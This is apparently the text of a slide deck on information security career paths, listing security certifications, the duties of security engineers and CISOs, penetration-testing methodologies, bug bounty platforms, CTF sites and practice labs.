• GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)

Security Analysis

• Resources

• http://www.opensecuritytraining.info/Exploits2.html

• http://www.opensecuritytraining.info/Exploits1.html

• http://www.opensecuritytraining.info/IntermediateX86.html

InfoSec Trends: Security Engineering

- Network Security Engineer

- Computer Security Engineer

- Security Architect

InfoSec Trends

• Responsibilities of a Security Engineer

– Develop, review and update information security policies, processes, guidelines and hardening standards.

– Develop and execute annual information security assessment plans.

– Develop and maintain the information security risk register.

– Perform the network security operations for all related systems: firewalls, IDS/IPS, VPN, PKI, content security, SIEM, identity and authentication management systems, DLP, etc.

InfoSec’ Trend

• Certification

– CCNA/CCNP (Security)

– CompTIA Security+

– ENSA (EC-Council)

– CISM

– CISA

InfoSec Trends: Policy Maker (CISO / InfoSec Manager / Director of InfoSec)

InfoSec Trends

• Responsibilities of a CISO

– Establishing and implementing security-related policies.

– Overseeing regulatory compliance.

– Ensuring data privacy.

– Managing the company's CERT team.

– Supervising identity and access management.

– Establishing and overseeing the organization's security architecture.

– Conducting electronic discovery and digital forensic investigations.

– Working with other high-level executives to establish disaster recovery and business continuity plans.

InfoSec Trends

• Top penetration testing methodologies

– ISSAF

• Information Systems Security Assessment Framework

– OSSTMM

• Open Source Security Testing Methodology Manual (ISECOM)

– OWASP

• Open Web Application Security Project (Testing Guide)

InfoSec Trends

• Certification

• CISSP

– Architecture (CISSP-ISSAP)

– Engineering (CISSP-ISSEP)

– Management (CISSP-ISSMP)

• CCISO (EC-Council)

• CISSO (mile2)

• PCI DSS (e.g. QSA)

InfoSec Hall of Fame

• Bug Hunting

• CTF/Wargame

• CVE Disclosure

• Opensource InfoSec Tool Development

Bug hunting

https://bugcrowd.com/

Bug hunting

https://hackerone.com

Bug hunting

https://technet.microsoft.com/en-us/security/dn425036

CTF & Wargame

• An introductory CTF like CSAW, Pico

CTF, Microcorruption, or any of the

other dozens available.

• CTF competitions archive

(http://captf.com/)

CTF & Wargame

• Difficulty is subjective based on your

individual skill set.

• CTF competitions generally focus on

the following skills: Reverse

engineering, Cryptography,

Programming challenge, Web

vulnerabilities, Binary exercises,

Networking, and Forensics.

CTF & Wargame

https://ctftime.org/


CTF & Wargame

http://captf.com/calendar/

Practice Lab

• https://www.vulnhub.com/

• https://exploit-exercises.com/

• http://captf.com/practice-ctf/

Conclusion

• CSOs and CISOs need to continually monitor the evolving threat landscape, and to replace an "if we get hacked" mindset with a "when we get hacked" one.

• InfoSec is an art:

– Think outside the box

– Try harder

Thank You For Your Attention !